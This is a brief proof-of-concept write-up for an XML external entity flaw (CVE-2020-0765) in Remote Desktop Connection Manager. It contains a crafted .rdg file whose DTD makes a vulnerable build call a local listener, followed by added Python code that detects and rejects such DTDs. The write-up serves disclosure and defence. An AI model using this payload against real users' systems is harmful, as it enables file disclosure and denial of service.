CVE-2020-0765: Quick proof of concept

Remote Desktop Connection Manager (RDCMan) spins up ancient XmlReader and XmlTextReader instances without restricting DTD processing or entity resolution, resulting in a bag of information disclosure (and denial of service) vulnerabilities. Here's a quick .rdg I put together to test against: its DTD declares an external entity that points at a local listener, and a vulnerable build reaches out to that listener when it expands &foo;.

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
  <!ELEMENT file (#PCDATA)>
  <!ENTITY foo SYSTEM "http://localhost:11223/">
]>

<RDCMan programVersion="2.7" schemaVersion="3">
  <file>
    <credentialsProfiles />
    <properties>
      <expanded>True</expanded>
      <name>test</name>
      <junk>&foo;</junk>
    </properties>
    <server>
      <properties>
        <name>test</name>
      </properties>
    </server>
  </file>
  <connected />
  <favorites />
  <recentlyUsed />
</RDCMan>
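As an added example (not part of the original post, and not RDCMan's code), here is a small Python check a defender can run over .rdg files before they are opened: it lists the external entities a DTD declares without resolving any of them, and shows a strict parse that refuses any DOCTYPE, which is the effect of DtdProcessing.Prohibit on a .NET XmlReader. The two sample documents and the localhost URL are constructed, modelled on the proof of concept above.

```python
import xml.parsers.expat as expat
from xml.etree import ElementTree as ET

# Constructed samples modelled on the PoC above; the URL is a placeholder.
POC_RDG = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ENTITY foo SYSTEM "http://localhost:11223/">
]>
<RDCMan programVersion="2.7" schemaVersion="3">
  <file><properties><name>test</name><junk>&foo;</junk></properties></file>
</RDCMan>"""
CLEAN_RDG = b"""<?xml version="1.0" encoding="utf-8"?>
<RDCMan programVersion="2.7" schemaVersion="3">
  <file><properties><name>test</name></properties></file>
</RDCMan>"""

class DtdFound(Exception):
    """Raised when a document carries a DOCTYPE and DTDs are prohibited."""

def external_entities(data: bytes) -> list:
    """Return (name, system_id) for each external entity the DTD declares.
    No ExternalEntityRefHandler is installed, so nothing is fetched."""
    found = []
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None:  # SYSTEM/PUBLIC identifier => external entity
            found.append((name, system_id))
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(data, True)
    return found

def parse_rdg_strict(data: bytes) -> ET.Element:
    """Parse an .rdg document, refusing any DOCTYPE before an entity can be
    declared (the effect of DtdProcessing.Prohibit on a .NET XmlReader)."""
    guard = expat.ParserCreate()
    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdFound(f"DOCTYPE {name!r} is not allowed in .rdg files")
    guard.StartDoctypeDeclHandler = reject_doctype
    guard.Parse(data, True)  # raises DtdFound for the PoC, returns for clean files
    return ET.fromstring(data)

def is_safe_rdg(data: bytes) -> bool:
    """True when the document parses with DTDs prohibited."""
    try:
        parse_rdg_strict(data)
        return True
    except DtdFound:
        return False
```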